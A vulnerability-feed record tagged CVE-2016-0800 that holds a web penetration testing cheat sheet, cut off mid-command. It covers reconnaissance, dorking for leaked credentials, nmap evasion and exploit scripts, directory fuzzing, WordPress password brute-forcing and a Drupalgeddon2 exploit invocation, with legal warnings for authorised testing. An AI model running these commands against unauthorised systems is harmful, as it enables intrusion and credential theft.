{"uuid": "0ff27ea8-537d-46eb-bb01-18b8ad82de11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-0800", "type": "seen", "source": "https://gist.github.com/SixthHunter/03cef581e03578d6e37a331dc3a3abad", "content": "# Web Penetration Testing Cheat Sheet\n\n## Complete Guide to Ethical Hacking & Web Application Security Testing\n\n---\n\n## \ud83d\udccb Table of Contents\n- [Introduction](#introduction)\n- [Legal & Ethical Considerations](#legal--ethical-considerations)\n- [Penetration Testing Methodology](#penetration-testing-methodology)\n- [Initial Setup & Installation](#initial-setup--installation)\n- [Reconnaissance (Information Gathering)](#reconnaissance-information-gathering)\n- [Port & Service Scanning](#port--service-scanning)\n- [Web Enumeration](#web-enumeration)\n- [Vulnerability Assessment](#vulnerability-assessment)\n- [SQL Injection (SQLi)](#sql-injection-sqli)\n- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)\n- [Authentication Attacks](#authentication-attacks)\n- [File Inclusion Vulnerabilities](#file-inclusion-vulnerabilities)\n- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)\n- [Command Injection](#command-injection)\n- [API Testing](#api-testing)\n- [SSL/TLS Security](#ssltls-security)\n- [Post-Exploitation](#post-exploitation)\n- [Reporting](#reporting)\n- [Tools Reference](#tools-reference)\n- [Practice Labs & Resources](#practice-labs--resources)\n- [Sample Scripts](#sample-scripts)\n\n---\n\n## Introduction\n\nWeb penetration testing is the practice of simulating cyberattacks against web applications to identify security vulnerabilities before malicious actors can exploit them. 
This comprehensive guide covers everything from initial reconnaissance to post-exploitation and reporting.\n\nWhether you're preparing for certifications like OSCP, CEH, or GWAPT, or you're a security professional looking to expand your skills, this cheat sheet provides practical commands, techniques, and real-world examples.\n\n---\n\n## Legal & Ethical Considerations\n\n### \u26a0\ufe0f IMPORTANT LEGAL WARNING\n\n**Penetration testing without explicit written permission is ILLEGAL** in most jurisdictions:\n- **USA**: Computer Fraud and Abuse Act (CFAA)\n- **UK**: Computer Misuse Act 1990\n- **EU**: General Data Protection Regulation (GDPR) and local cybercrime laws\n- **Australia**: Cybercrime Act 2001\n\n### Requirements Before Testing:\n1. **Signed Authorization Letter** - Must specify:\n   - Target scope (IP ranges, domains, applications)\n   - Testing dates and times\n   - Allowed testing methods\n   - Emergency contact information\n   - Legal jurisdiction and liability clauses\n\n2. **Rules of Engagement Document** covering:\n   - What constitutes out-of-scope activity\n   - Data handling procedures\n   - Notification thresholds for critical findings\n   - Third-party considerations\n\n3. 
**Insurance & Professional Indemnity** (for professional testers)\n\n### Certifications & Training:\n- **OSCP** (Offensive Security) - Hands-on penetration testing\n- **OSWP** (Offensive Security Wireless Professional)\n- **OSWE** (Offensive Security Web Expert)\n- **CEH** (EC-Council) - Certified Ethical Hacker\n- **eWPT/X** (eLearnSecurity) - Web penetration tester\n- **PNPT** (TCM Security) - Practical Network Penetration Tester\n- **BSCP** (PortSwigger) - Burp Suite Certified Practitioner\n- **GWAPT** (GIAC) - Web Application Penetration Tester\n- **CISSP** (ISC\u00b2) - Security management (requires experience)\n\n---\n\n## Penetration Testing Methodology\n\n### The 8 Phases of Penetration Testing\n\n| Phase | Name | Key Activities (Detailed) | Deliverables |\n| ----- | ---- | ------------------------- | ------------ |\n| **1** | **Planning** | \u2022 Define scope (IPs, domains, applications, APIs)<br>\u2022 Identify in-scope / out-of-scope assets<br>\u2022 Establish Rules of Engagement (RoE)<br>\u2022 Obtain legal authorization & NDA<br>\u2022 Determine testing methodology (e.g., OWASP Testing Guide, PTES)<br>\u2022 Identify stakeholders & communication channels<br>\u2022 Set testing timeline and escalation procedures<br>\u2022 Define success criteria & reporting format | Signed contract, scope document |\n| **2** | **Reconnaissance** | \u2022 Passive OSINT (WHOIS, social media, breach databases)<br>\u2022 Identify employee emails & technology stack<br>\u2022 DNS enumeration & zone transfer attempts<br>\u2022 Subdomain discovery (bruteforce + certificate transparency logs)<br>\u2022 Search engine reconnaissance (Google dorking)<br>\u2022 Metadata extraction from public documents<br>\u2022 Identify third-party integrations & cloud services<br>\u2022 Gather leaked credentials from public sources | Target profile, attack surface map |\n| **3** | **Scanning** | \u2022 Network discovery (live host identification)<br>\u2022 TCP/UDP port scanning<br>\u2022 Service version detection & banner grabbing<br>\u2022 OS fingerprinting<br>\u2022 SSL/TLS configuration analysis<br>\u2022 Firewall/WAF detection<br>\u2022 Vulnerability scanning using automated tools<br>\u2022 Identify misconfigurations (open S3 buckets, exposed databases) | Network map, open ports, services |\n| **4** | **Enumeration** | \u2022 Directory and file brute-forcing<br>\u2022 API endpoint discovery<br>\u2022 Parameter fuzzing & input testing<br>\u2022 User account enumeration (login, password reset)<br>\u2022 SMB/LDAP enumeration<br>\u2022 Database fingerprinting<br>\u2022 Identify hidden functionality in JavaScript files<br>\u2022 Review robots.txt & sitemap.xml | Content inventory, potential entry points |\n| **5** | **Vulnerability Assessment** | \u2022 Automated vulnerability scanning<br>\u2022 Manual verification of findings<br>\u2022 CVE & exploit database research<br>\u2022 Misconfiguration analysis<br>\u2022 Authentication & authorization testing<br>\u2022 Business logic testing<br>\u2022 Rate limiting & brute-force testing<br>\u2022 Map vulnerabilities to CVSS scoring<br>\u2022 Prioritize risks (Critical, High, Medium, Low) | Vulnerability list, risk ratings |\n| **6** | **Exploitation** | \u2022 Develop proof-of-concept (PoC) exploits<br>\u2022 Exploit web vulnerabilities (SQLi, XSS, RCE, SSRF)<br>\u2022 Password attacks (brute-force, credential stuffing)<br>\u2022 Privilege escalation (local & domain level)<br>\u2022 Exploit known CVEs<br>\u2022 Gain shell access (reverse shell, web shell)<br>\u2022 Bypass WAF/IDS mechanisms<br>\u2022 Data extraction under controlled conditions | Exploited vulnerabilities, access gained |\n| **7** | **Post-Exploitation** | \u2022 Establish persistence mechanisms<br>\u2022 Lateral movement across network<br>\u2022 Token impersonation & pass-the-hash attacks<br>\u2022 Dump credentials & password hashes<br>\u2022 Sensitive data discovery (PII, financial data)<br>\u2022 Privilege escalation to domain admin<br>\u2022 Simulate data exfiltration<br>\u2022 Log analysis & detection evasion techniques<br>\u2022 Assess business impact of compromise | Compromised systems, sensitive data |\n| **8** | **Reporting** | \u2022 Document technical findings with evidence (screenshots, logs)<br>\u2022 Risk severity classification & impact analysis<br>\u2022 Business risk explanation for executives<br>\u2022 Remediation & mitigation recommendations<br>\u2022 Re-test verification (if required)<br>\u2022 Executive summary (non-technical)<br>\u2022 Technical appendix with reproduction steps<br>\u2022 Final presentation to stakeholders | Final report, presentation |\n\n### Testing Types:\n- **Black Box**: No prior knowledge of the system\n- **White Box**: Full access to source code, architecture, credentials\n- **Grey Box**: Partial knowledge (e.g., authenticated access)\n- **Blind Testing**: Tester knows target, target doesn't know tester\n- **Double-Blind**: Neither side knows about the test\n- **Red Team**: Full-scope adversarial simulation\n- **Purple Team**: Collaborative testing with defensive teams\n\n---\n\n## Initial Setup & Installation\n\n### Installing Kali Linux\n\n**Option 1: Virtual Machine (Recommended)**\n```bash\n# Download Kali Linux VM from official site\n# Import into VirtualBox/VMware\n# Default credentials: kali:kali\n```\n\n**Option 2: Bare Metal**\n```bash\n# Download ISO from kali.org\n# Create bootable USB: dd if=kali.iso of=/dev/sdb bs=4M status=progress\n# Boot and install\n```\n\n**Option 3: Docker**\n```bash\ndocker pull kalilinux/kali-rolling\ndocker run -it kalilinux/kali-rolling /bin/bash\n```\n\n**Option 4: Windows Subsystem for Linux (WSL2)**\n```bash\n# Install WSL2, then:\nwsl --install -d kali-linux\n```\n\n### Essential Tools Installation\n\n```bash\n# Update package lists\nsudo apt update && sudo apt upgrade -y\n\n# Core scanning tools\nsudo apt install -y nmap nikto gobuster dirb wfuzz\n\n# Web application tools\nsudo apt install -y sqlmap burpsuite zaproxy\n\n# Brute force tools\nsudo apt install -y hydra medusa john hashcat\n\n# Enumeration tools\nsudo apt install -y ffuf wfuzz whatweb wafw00f\n\n# Reconnaissance tools\nsudo apt install -y sublist3r amass theharvester dnsrecon\n\n# Exploitation framework\nsudo apt install -y metasploit-framework\n\n# Networking tools\nsudo apt install -y netcat-openbsd socat wireshark tcpdump\n\n# Post-exploitation\nsudo apt install -y impacket-scripts pwncat\n\n# Wordlists\nsudo apt install -y seclists wordlists\n```\n\n### Python Tools Installation\n```bash\n# Install pip if not 
present\nsudo apt install -y python3-pip\n\n# Python-based tools\npip3 install theHarvester dalfox xsstrike\npip3 install impacket pwncat-cs\npip3 install dnspython requests beautifulsoup4\npip3 install shodan censys\npip3 install argon2 python-nmap\n```\n\n### Directory Structure Setup\n```bash\n# Create organized workspace\nmkdir -p ~/pentest/{tools,wordlists,scripts,reports,loot}\n\n# Create target-specific directories\nmkdir -p ~/pentest/$(date +%Y%m%d)_target/{recon,scans,exploit,evidence}\ncd ~/pentest/$(date +%Y%m%d)_target\n```\n\n### Environment Variables\n```bash\n# Add to ~/.bashrc for persistence\nexport TARGET=\"10.10.10.1\"\nexport DOMAIN=\"target.com\"\n# IPv4 address of the VPN interface: match only the 'inet' line, otherwise\n# the interface header line (\"5: tun0: ...\") is captured too\nexport LHOST=$(ip -4 addr show tun0 | awk '/inet / {print $2}' | cut -d/ -f1)\nexport WORDLIST=\"/usr/share/wordlists/rockyou.txt\"\n\n# Source the file\nsource ~/.bashrc\n```\n\n### Burp Suite Configuration\n1. **Proxy Setup**:\n   - Browser \u2192 Settings \u2192 Network \u2192 Manual proxy: `127.0.0.1:8080`\n   - Install Burp CA certificate\n   - Firefox: Preferences \u2192 Privacy & Security \u2192 Certificates \u2192 Import\n\n2. **FoxyProxy** browser extension for quick proxy switching\n\n3. 
**Scope Configuration**:\n   - Target tab \u2192 Scope \u2192 Add to scope\n   - Exclude out-of-scope items\n\n### /etc/hosts Configuration\n```bash\n# Add target domains for easier access\nsudo tee -a /etc/hosts << EOF\n10.10.10.1    target.htb dev.target.htb admin.target.htb\n10.10.10.2    mail.target.htb vpn.target.htb\nEOF\n```\n\n---\n\n## Reconnaissance (Information Gathering)\n\n### DNS Enumeration\n\n#### Basic DNS Queries\n```bash\n# WHOIS information\nwhois target.com\n\n# All DNS records\ndig target.com ANY +noall +answer\nnslookup -type=ANY target.com\n\n# MX records (mail servers)\ndig target.com MX +short\nnslookup -type=MX target.com\n\n# NS records (name servers)\ndig target.com NS +short\nhost -t ns target.com\n\n# TXT records (SPF, DKIM, verification)\ndig target.com TXT +short\nnslookup -type=TXT target.com\n\n# A/AAAA records\ndig target.com A +short\ndig target.com AAAA +short\n\n# CNAME records\ndig www.target.com CNAME +short\n\n# SOA record (start of authority)\ndig target.com SOA +short\n```\n\n#### Zone Transfer Attempt\n```bash\n# Attempt zone transfer from each name server\nfor ns in $(dig NS target.com +short); do\n    echo \"Attempting zone transfer from $ns\"\n    dig AXFR target.com @$ns\ndone\n\n# Using host command\nhost -l target.com ns1.target.com\n```\n\n#### Reverse DNS Lookup\n```bash\n# Find domains hosted on IP\ndig -x 192.168.1.1 +short\nnslookup 192.168.1.1\n```\n\n### Subdomain Enumeration\n\n#### Passive Techniques (No direct interaction)\n```bash\n# Sublist3r - Multiple sources\nsublist3r -d target.com -o subdomains.txt\nsublist3r -d target.com -b google,yahoo,bing,baidu -t 50\n\n# Amass - Passive mode\namass enum -passive -d target.com -o amass_passive.txt\n\n# TheHarvester - Search engines\ntheHarvester -d target.com -b all -f theharvester.html\n\n# Certificate Transparency (crt.sh)\ncurl -s \"https://crt.sh/?q=%.target.com&output=json\" | jq .\n\n# Using SecurityTrails API\ncurl -s \"https://api.securitytrails.com/v1/domain/target.com/subdomains\" \\\n     -H \"APIKEY: YOUR_API_KEY\" | jq -r '.subdomains[]'\n\n# Shodan\nshodan search hostname:target.com\n```\n\n#### Active Techniques\n```bash\n# Amass - Active enumeration\namass enum -active -d target.com -o amass_active.txt\namass enum -active -d target.com -brute -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\n# Gobuster DNS mode\ngobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 50\n\n# ffuf for vhost discovery\nffuf -u http://target.com -H \"Host: FUZZ.target.com\" \\\n     -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\\n     -fc 400,404,403\n\n# DNSRecon\ndnsrecon -d target.com -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t brt\n\n# DNSEnum\ndnsenum target.com\n```\n\n### Technology Stack Identification\n\n```bash\n# WhatWeb - Comprehensive\nwhatweb target.com\nwhatweb target.com --aggression 3 --log-brief=whatweb.txt\n\n# Wappalyzer (browser extension)\n\n# BuiltWith (online service)\n\n# Wafw00f - WAF detection\nwafw00f target.com\nwafw00f target.com -a  # aggressive\n\n# HTTP headers inspection\ncurl -sI https://target.com\ncurl -sI https://target.com | grep -i \"server\\|x-powered-by\\|via\"\n\n# Web server fingerprinting\nhttpx -u target.com -tech-detect -status-code -title -follow-redirects\n\n# CMS detection\n# WordPress\nwpscan --url target.com --api-token YOUR_TOKEN\n\n# Joomla\njoomscan -u target.com\n\n# Drupal\ndroopescan scan drupal -u target.com\n```\n\n### OSINT (Open Source Intelligence)\n\n#### Email Discovery\n```bash\n# theHarvester\ntheHarvester -d target.com -b all -f results.html\ntheHarvester -d target.com -b google,bing,linkedin\n\n# Hunter.io (API required)\ncurl -s \"https://api.hunter.io/v2/domain-search?domain=target.com&api_key=KEY\" | jq\n\n# EmailHarvester\npython3 EmailHarvester.py -d target.com\n```\n\n#### Social Media\n- 
LinkedIn: Search for employees, job postings, technologies used\n- Twitter: Company handles, employee mentions\n- GitHub: Search for company repos, code leaks, API keys\n- Glassdoor: Employee reviews, technologies mentioned\n\n#### Code Repositories\n```bash\n# GitHub dorks\nsite:github.com \"target.com\"\nsite:github.com \"target.com\" \"api_key\"\nsite:github.com \"target.com\" \"password\"\n\n# Gitrob (requires GitHub token)\ngitrob -target target.com\n\n# TruffleHog - find secrets\ntrufflehog github --org=target-org\n```\n\n#### Wayback Machine\n```bash\n# View historical versions\nwaybackurls target.com | tee wayback_urls.txt\n\n# Extract endpoints\ngau target.com | tee gau_urls.txt\n```\n\n#### Google Dorking\n```\n# Common dorks\nsite:target.com\nsite:target.com filetype:pdf\nsite:target.com inurl:admin\nsite:target.com intitle:\"index of\"\nsite:target.com ext:php | ext:asp | ext:aspx | ext:jsp\nsite:target.com inurl:wp-content\nsite:target.com \"confidential\" | \"internal use only\"\nsite:target.com intext:\"sql syntax near\" | intext:\"syntax error has occurred\" | intext:\"incorrect syntax near\"\nsite:target.com inurl:php?id=\nsite:target.com \"powered by\" | \"built with\"\n```\n\n### Cloud & Infrastructure Discovery\n\n```bash\n# Find cloud assets\n# AWS\ncurl -s http://target.com.s3.amazonaws.com\ncurl -s http://s3.amazonaws.com/target.com\n\n# Azure\ncurl -s http://target.com.blob.core.windows.net\n\n# Google Cloud\ncurl -s http://storage.googleapis.com/target.com\n\n# Shodan queries\nshodan search \"hostname:target.com\" --fields ip_str,port,org,hostnames\nshodan search \"ssl:target.com\" --fields ip_str,port\nshodan search \"http.title:target\" --fields ip_str,port\n\n# Censys\ncensys search \"target.com\"\n```\n\n---\n\n## Port & Service Scanning\n\n### Nmap Fundamentals\n\n#### Basic Scans\n```bash\n# Fast scan (-F limits the scan to the 100 most common ports; the default is the top 1000)\nnmap -T4 -F target.com\n\n# Version detection\nnmap -sV target.com\n\n# OS detection\nnmap -O target.com\n\n# Default scripts\nnmap -sC target.com\n\n# Combined: version + scripts\nnmap -sV -sC target.com\n\n# Aggressive scan (OS + version + scripts + traceroute)\nnmap -A -T4 target.com\n```\n\n#### Port Selection\n```bash\n# Specific ports\nnmap -p 80,443,8080,8443 target.com\n\n# Port range\nnmap -p 1-1000 target.com\n\n# All ports (65535) - slow\nnmap -p- target.com\n\n# Fast all-ports scan (--min-rate forces at least 5000 packets/s; noisy and less accurate)\nnmap -p- --min-rate 5000 target.com\n\n# Most common ports\nnmap --top-ports 200 target.com\n```\n\n#### Scan Types\n```bash\n# TCP SYN scan (default, requires root)\nsudo nmap -sS target.com\n\n# TCP Connect scan (no root)\nnmap -sT target.com\n\n# UDP scan\nsudo nmap -sU target.com\nsudo nmap -sU --top-ports 50 target.com\n\n# FIN scan (bypass some firewalls)\nsudo nmap -sF target.com\n\n# NULL scan\nsudo nmap -sN target.com\n\n# Xmas scan\nsudo nmap -sX target.com\n\n# ACK scan (map firewall rules)\nsudo nmap -sA target.com\n\n# Window scan\nsudo nmap -sW target.com\n\n# Maimon scan\nsudo nmap -sM target.com\n```\n\n#### Output Formats\n```bash\n# Normal output\nnmap -oN scan.txt target.com\n\n# XML output (for tools)\nnmap -oX 
scan.xml target.com\n\n# Grepable output\nnmap -oG scan.gnmap target.com\n\n# All formats\nnmap -oA scan target.com\n```\n\n### Advanced Nmap Techniques\n\n#### Timing and Performance\n```bash\n# Timing templates\n# T0 = Paranoid, T1 = Sneaky, T2 = Polite, T3 = Normal, T4 = Aggressive, T5 = Insane\nnmap -T4 target.com\n\n# Host timeout\nnmap --host-timeout 30m target.com\n\n# Max retries\nnmap --max-retries 3 target.com\n\n# Min/max rate\nnmap --min-rate 100 --max-rate 500 target.com\n\n# Parallelism\nnmap --min-hostgroup 50 --max-hostgroup 100 target.com\n```\n\n#### Firewall/IDS Evasion\n```bash\n# Fragment packets\nsudo nmap -f target.com\n\n# Specify MTU (must be multiple of 8)\nsudo nmap --mtu 16 target.com\n\n# Decoy scans\nsudo nmap -D RND:10 target.com\nsudo nmap -D decoy1,decoy2,ME target.com\n\n# Spoof source port\nsudo nmap --source-port 53 target.com\n\n# Randomize hosts\nsudo nmap --randomize-hosts target.com\n\n# MAC address spoofing\nsudo nmap --spoof-mac Apple target.com\nsudo nmap --spoof-mac 00:11:22:33:44:55 target.com\n\n# Idle scan (zombie)\nsudo nmap -sI zombie_host target.com\n```\n\n#### Script Scanning\n```bash\n# Run all safe scripts\nnmap -sV --script safe target.com\n\n# Run vulnerability scripts\nnmap -sV --script vuln target.com\n\n# Run exploit scripts\nnmap --script exploit target.com\n\n# Run specific category\nnmap --script default,auth,discovery target.com\n\n# Run specific script\nnmap --script http-enum target.com\nnmap --script http-title target.com\nnmap --script dns-brute target.com\n\n# Script with arguments\nnmap --script http-brute --script-args userdb=users.txt,passdb=pass.txt target.com\n\n# HTTP enumeration\nnmap -p 80,443,8080,8443 --script http-enum,http-headers,http-title,http-server-header target.com\n\n# SMB enumeration\nnmap -p 445 --script smb-enum-shares,smb-enum-users,smb-os-discovery target.com\n```\n\n### Nmap Scripting Engine Examples\n\n```bash\n# HTTP vuln scanning\nnmap -p 80,443 --script http-vuln-* 
target.com\n\n# SQL injection detection\nnmap -p 80 --script http-sql-injection target.com\n\n# XSS detection\nnmap -p 80 --script http-unsafe-output-escaping target.com\n\n# Shellshock detection\nnmap -p 80 --script http-shellshock target.com\n\n# Heartbleed detection\nnmap -p 443 --script ssl-heartbleed target.com\n\n# DNS zone transfer\nnmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=target.com target.com\n\n# SSL/TLS enumeration\nnmap -p 443 --script ssl-enum-ciphers target.com\nnmap -p 443 --script ssl-cert target.com\n\n# FTP enumeration\nnmap -p 21 --script ftp-anon,ftp-brute,ftp-syst target.com\n\n# SSH enumeration\nnmap -p 22 --script ssh2-enum-algos,ssh-hostkey,ssh-auth-methods target.com\n```\n\n### Practical Nmap Workflow\n\n```bash\n#!/bin/bash\n# Complete Nmap scanning workflow\n\nTARGET=\"10.10.10.1\"\nOUTDIR=\"./nmap_scan_$(date +%Y%m%d_%H%M%S)\"\nmkdir -p $OUTDIR\n\necho \"[*] Starting Nmap scan against $TARGET\"\necho \"[*] Output directory: $OUTDIR\"\n\n# Phase 1: Quick port scan\necho \"[*] Phase 1: Quick top-1000 port scan\"\nnmap -T4 --open -oN $OUTDIR/quick.txt $TARGET\n\n# Phase 2: Full port scan (all ports)\necho \"[*] Phase 2: Full port scan (all 65535)\"\nnmap -p- -T4 --min-rate 5000 -oN $OUTDIR/allports.txt $TARGET\n\n# Extract open ports\nPORTS=$(grep ^[0-9] $OUTDIR/allports.txt | cut -d'/' -f1 | tr '\\n' ',' | sed 's/,$//')\necho \"[+] Open ports: $PORTS\"\n\n# Phase 3: Service and version detection\necho \"[*] Phase 3: Service and version detection\"\nnmap -p $PORTS -sV -sC -A -oN $OUTDIR/services.txt -oX $OUTDIR/services.xml $TARGET\n\n# Phase 4: Vulnerability scan\necho \"[*] Phase 4: Vulnerability scan with NSE\"\nnmap -p $PORTS --script vuln -oN $OUTDIR/vuln.txt $TARGET\n\n# Phase 5: Safe script scan\necho \"[*] Phase 5: Safe script scan\"\nnmap -p $PORTS --script safe -oN $OUTDIR/safe_scripts.txt $TARGET\n\n# Phase 6: UDP scan (top 100 ports)\necho \"[*] Phase 6: UDP scan (top 100 ports)\"\nsudo nmap -sU 
--top-ports 100 -oN $OUTDIR/udp.txt $TARGET\n\necho \"[+] Scan complete! Results in $OUTDIR\"\n```\n\n---\n\n## Web Enumeration\n\n### Directory & File Brute Forcing\n\n#### Gobuster\n```bash\n# Directory enumeration\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50\n\n# With extensions\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,asp,aspx,jsp,html,txt,bak,zip,sql\n\n# Show only these status codes (-s cannot be combined with -b)\ngobuster dir -u https://target.com -w wordlist.txt -s 200,204,301,302,307,403\n\n# Exclude status codes\ngobuster dir -u https://target.com -w wordlist.txt -b 404,403\n\n# Follow redirects\ngobuster dir -u https://target.com -w wordlist.txt -r\n\n# Cookies and headers\ngobuster dir -u https://target.com -w wordlist.txt -c \"session=abc123\"\ngobuster dir -u https://target.com -w wordlist.txt -H \"Authorization: Bearer token\"\n\n# DNS subdomain enumeration\ngobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50\n\n# VHost enumeration\ngobuster vhost -u https://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50\n```\n\n#### FFUF (Faster Fuzzer)\n```bash\n# Basic directory fuzzing\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt\n\n# With extensions\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.asp,.aspx,.jsp,.html,.txt\n\n# Filter by status codes\nffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404,403\nffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,204,301,302\n\n# Filter by response size\nffuf -u https://target.com/FUZZ -w wordlist.txt -fs 0\nffuf -u https://target.com/FUZZ -w wordlist.txt -fw 0\nffuf -u https://target.com/FUZZ -w wordlist.txt -fl 0\n\n# Recursive scanning\nffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2\n\n# POST request fuzzing\nffuf -u https://target.com/login -X POST -d \"username=FUZZ&password=test\" -H \"Content-Type: application/x-www-form-urlencoded\" -w usernames.txt -fc 401\n\n# Header fuzzing\nffuf -u https://target.com -H \"Host: FUZZ.target.com\" -w subdomains.txt -fc 400,404\n\n# Parameter fuzzing\nffuf -u https://target.com/page?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fc 404\n\n# Cookie fuzzing\nffuf -u https://target.com -b \"session=FUZZ\" -w wordlist.txt -fc 302\n\n# Multiple FUZZ points (-w takes wordlist:KEYWORD, path first)\nffuf -u https://target.com/FUZZ1?param=FUZZ2 -w dirs.txt:FUZZ1 -w params.txt:FUZZ2\n```\n\n#### Dirb\n```bash\n# Basic scan\ndirb https://target.com\n\n# With custom wordlist\ndirb https://target.com /usr/share/wordlists/dirb/big.txt\n\n# With extensions\ndirb https://target.com -X .php,.html,.txt\n\n# Non-recursive\ndirb https://target.com -r\n\n# Use cookies\ndirb https://target.com -c \"session=abc123\"\n\n# Use proxy\ndirb https://target.com -p 127.0.0.1:8080\n```\n\n#### Wfuzz\n```bash\n# Directory scanning\nwfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 https://target.com/FUZZ\n\n# File extensions\nwfuzz -c -z file,wordlist.txt -z list,php-asp-jsp https://target.com/FUZZ.FUZ2Z\n\n# POST parameter fuzzing\nwfuzz -c -z file,usernames.txt -d \"username=FUZZ&password=test\" https://target.com/login\n\n# Cookie fuzzing\nwfuzz -c -z file,sessions.txt -b \"session=FUZZ\" https://target.com/dashboard\n\n# Header injection\nwfuzz -c -z file,headers.txt -H \"FUZZ: test\" https://target.com\n```\n\n### Web Server Vulnerability Scanning\n\n#### Nikto\n```bash\n# Basic scan\nnikto -h https://target.com\n\n# Specific port\nnikto -h https://target.com -p 8443\n\n# With authentication\nnikto -h https://target.com -id admin:password\n\n# SSL/TLS specific\nnikto -h https://target.com -ssl\n\n# Save output\nnikto -h https://target.com -o nikto_scan.txt\n\n# Tuning (select specific test categories; note that 6 is Denial of Service)\nnikto -h https://target.com -Tuning 123456\n# 0=File Upload, 1=Interesting File / Seen in logs, 2=Misconfiguration / Default File,\n# 3=Information Disclosure, 4=Injection (XSS/Script/HTML), 5=Remote File Retrieval (inside web root),\n# 6=Denial of Service, 7=Remote File Retrieval (server wide), 8=Command Execution / Remote Shell,\n# 9=SQL Injection, a=Authentication Bypass, b=Software Identification, c=Remote Source Inclusion,\n# x=Reverse tuning (run everything except the listed categories)\n\n# Use proxy\nnikto -h https://target.com -useproxy http://127.0.0.1:8080\n\n# Evasion techniques (request encoding variants, useful for testing IDS/WAF coverage)\nnikto -h https://target.com -evasion 123\n# 1=Random URI encoding (non-UTF8), 2=Directory self-reference (/./), 3=Premature URL ending,\n# 4=Prepend long random string, 5=Fake parameter, 6=TAB as request spacer, 7=Change the case of the URL,\n# 8=Windows directory separator, A=Carriage return (0x0d) as request spacer, B=Binary value 0x0b as request spacer\n```\n\n#### WhatWeb\n```bash\n# Basic detection\nwhatweb https://target.com\n\n# Aggressive mode\nwhatweb https://target.com -a 3\n\n# Verbose output\nwhatweb https://target.com -v\n\n# Log output\nwhatweb https://target.com --log-brief=whatweb.txt\nwhatweb https://target.com --log-json=whatweb.json\nwhatweb https://target.com --log-sql=whatweb.sql\n\n# Multiple targets\nwhatweb --input-file=targets.txt\n```\n\n#### WPScan (WordPress)\n```bash\n# Basic scan\nwpscan --url https://target.com\n\n# Enumerate plugins\nwpscan --url https://target.com --enumerate p\n\n# Enumerate themes\nwpscan --url https://target.com --enumerate t\n\n# Enumerate users\nwpscan --url https://target.com --enumerate u\n\n# Enumerate vulnerable plugins/themes\nwpscan --url https://target.com --enumerate vp,vt\n\n# API token for vulnerability database\nwpscan --url https://target.com --api-token YOUR_TOKEN\n\n# Password brute force\nwpscan --url https://target.com --passwords rockyou.txt --usernames admin\n\n# Aggressive detection mode (more requests; finds plugins/themes that passive detection misses)\nwpscan --url https://target.com --detection-mode aggressive\n\n# Multisite scan\nwpscan --url https://target.com --multisite\n```\n\n### CMS-Specific Enumeration\n\n#### Joomla\n```bash\n# Joomscan\njoomscan -u https://target.com\n\n# Joomla vulnerability scanner\npython3 joomla-brute.py -u https://target.com -w passwords.txt -usr admin\n```\n\n#### Drupal\n```bash\n# Droopescan\ndroopescan scan drupal -u https://target.com\n\n# Drupalgeddon2\npython3 drupalgeddon2.py -u https://target.com\n```\n\n#### Magento\n```bash\n# MageScan\npython2 magento-scan.py -u https://target.com\n```\n\n### Virtual Host Discovery\n\n```bash\n# 
Using ffuf (-fs hides responses of the default vhost's size; 1234 is a placeholder, measure it first)\nffuf -u http://target.com -H \"Host: FUZZ.target.com\" -w subdomains.txt -fs 1234\n\n# Using gobuster\ngobuster vhost -u http://target.com -w subdomains.txt\n\n# Using wfuzz\nwfuzz -c -z file,subdomains.txt -H \"Host: FUZZ.target.com\" -u http://target.com --hc 400,404\n\n# Manual with curl\nfor sub in $(cat subdomains.txt); do\n    curl -s -H \"Host: $sub.target.com\" http://target.com | grep -q \"Welcome\" && echo \"Found: $sub\"\ndone\n```\n\n### API Endpoint Discovery\n\n```bash\n# Common API paths\nffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt\n\n# API version fuzzing (-w expects a file, so generate the numbers with process substitution)\nffuf -u https://target.com/api/vFUZZ -w <(seq 1 10) -fc 404\n\n# Swagger/OpenAPI discovery\nffuf -u https://target.com/FUZZ -w <(echo -e \"swagger.json\\nswagger.yaml\\nopenapi.json\\napi-docs\")\n\n# GraphQL discovery\nffuf -u https://target.com/FUZZ -w <(echo -e \"graphql\\ngraphiql\\ngraphql/console\\ngraphql/graphiql\")\n```\n\n### Robots.txt and Sitemap Analysis\n\n```bash\n# Check robots.txt\ncurl -s https://target.com/robots.txt\n\n# Check sitemap\ncurl -s https://target.com/sitemap.xml\ncurl -s https://target.com/sitemap_index.xml\n\n# Extract disallowed paths\ncurl -s https://target.com/robots.txt | grep \"Disallow\" | awk '{print $2}'\n\n# Extract sitemap URLs (the text inside each <loc> element)\ncurl -s https://target.com/sitemap.xml | grep -oP '(?<=<loc>)[^<]+'\n```\n\n### JavaScript File Analysis\n\n```bash\n# Download all JS files\nwget -r -l1 -A.js https://target.com\n\n# Extract endpoints from JS\ncat *.js | grep -Eo \"https?://[^/\\\\\\\"']+\" | sort -u\ncat *.js | grep -Eo \"/[a-zA-Z0-9_\\-/]+\\.(php|asp|aspx|jsp)\" | sort -u\n\n# LinkFinder\npython3 LinkFinder.py -i https://target.com -o cli\n\n# JSParser (for async endpoints)\npython2 JSParser.py https://target.com\n\n# SecretFinder\npython3 SecretFinder.py -i https://target.com -o 